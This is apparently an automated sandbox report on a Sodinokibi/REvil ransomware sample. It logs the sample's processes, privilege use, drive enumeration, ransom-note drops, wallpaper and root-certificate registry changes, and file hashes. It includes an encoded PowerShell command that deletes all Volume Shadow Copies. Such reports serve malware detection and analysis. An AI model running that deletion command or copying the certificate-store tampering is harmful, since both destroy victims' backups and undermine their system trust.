Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8
614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd 
C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe | N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Files

memory/1648-2-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-4-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-14-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-12-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-10-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-8-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-6-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-16-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-1-0x0000000000560000-0x0000000000580000-memory.dmp

memory/1648-18-0x0000000000560000-0x0000000000580000-memory.dmp

memory/3620-19-0x00007FFD6CD23000-0x00007FFD6CD25000-memory.dmp

memory/3620-20-0x00000251E17E0000-0x00000251E1802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m1hxdjrm.wbp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3620-30-0x00007FFD6CD20000-0x00007FFD6D7E1000-memory.dmp

memory/3620-31-0x00007FFD6CD20000-0x00007FFD6D7E1000-memory.dmp

memory/3620-34-0x00007FFD6CD20000-0x00007FFD6D7E1000-memory.dmp

memory/1648-35-0x0000000000560000-0x0000000000580000-memory.dmp

C:\Users\w7ld957-readme.txt

MD5 a42276028ce4ad5c81c692d06ee361cb
SHA1 fbed8d404bdca891fa177daa8c5918ac7b82b8b7
SHA256 d9d210920a89d8e622d077a59920fc4c914ee90f724cb8085e7a1744a3c90109
SHA512 d3eb66eedeebe31e7370bd34a01b8082218e70f9c625ad12d6dbee13ba0165f8ee50f6b128a4d3a91f426e5b5057287de7953f8cf1e0ab3e34c8f7175bc7f6e5

memory/1648-181-0x0000000000400000-0x0000000000454000-memory.dmp

memory/1648-458-0x0000000000560000-0x0000000000580000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-23 21:39

Reported

2024-12-23 21:42

Platform

win7-20241010-en

Max time kernel

140s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

Signatures

Sodin,Sodinokibi,REvil

ransomware sodinokibi

Sodinokibi family

sodinokibi

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\56u5ii.bmp" C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files\SetSkip.wmv C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\InvokeRemove.search-ms C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\MeasureProtect.mp3 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\OutWait.pptm C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CompressUnprotect.html C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SaveSwitch.gif C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SkipSend.iso C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UnlockLock.vsd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\WatchStep.avi C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\RegisterStart.i64 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ResolveSave.scf C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SelectMeasure.wm C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CopyResolve.zip C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\AssertUnblock.ini C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\AssertUnprotect.midi C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\EnterUnregister.xml C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SuspendInitialize.wvx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UninstallGet.dib C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ClearConfirm.3gp2 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SyncJoin.dwfx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CopyConvertTo.M2TS C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UninstallExpand.ttc C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\microsoft sql server compact edition\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\FormatRemove.dib C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\MergeBackup.7z C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\StartConvertTo.jpe C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\hoc5p0yrb-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\CloseCheckpoint.vbe C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\EnterProtect.rle C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\FindSet.m4a C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21
542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Files

C:\Users\hoc5p0yrb-readme.txt

MD5 f0b831ac96514a4f2bcbf0a9f01af675
SHA1 e7a630da9ee1d8963435208f534bf52c93f86601
SHA256 962a8428138b6056cfa56fd917287332a95495c8dabfd048c475a582b1f09c19
SHA512 4f37c052db6f67781f6804512331fd3c728c32f258f94c82f321ee591c6c631d74b36291b9178ea7fad0958ab7d581e68fd942b8c7936ee61f4a7c433082c62f

C:\Users\Admin\AppData\Local\Temp\CabCBAA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarCBCC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Windows\System32\catroot2\dberr.txt

MD5 ea33b6d8114f9afda771d14f7e83b842
SHA1 386b8a909eee9310c2d0508c8c27aa7f4a14a1d9
SHA256 d5a85e43659ee0e018a6e264485c31d6ad838089ad598093f1a146528a1d98bf
SHA512 6a209aa565e1ac779e86e4ede21288207a0d2c471ea8d41c3888e42ed34611f35dd35622b7a58fbd0ced3eb89ee42da2e627eb9d66f57c04e534e930f4f13e8b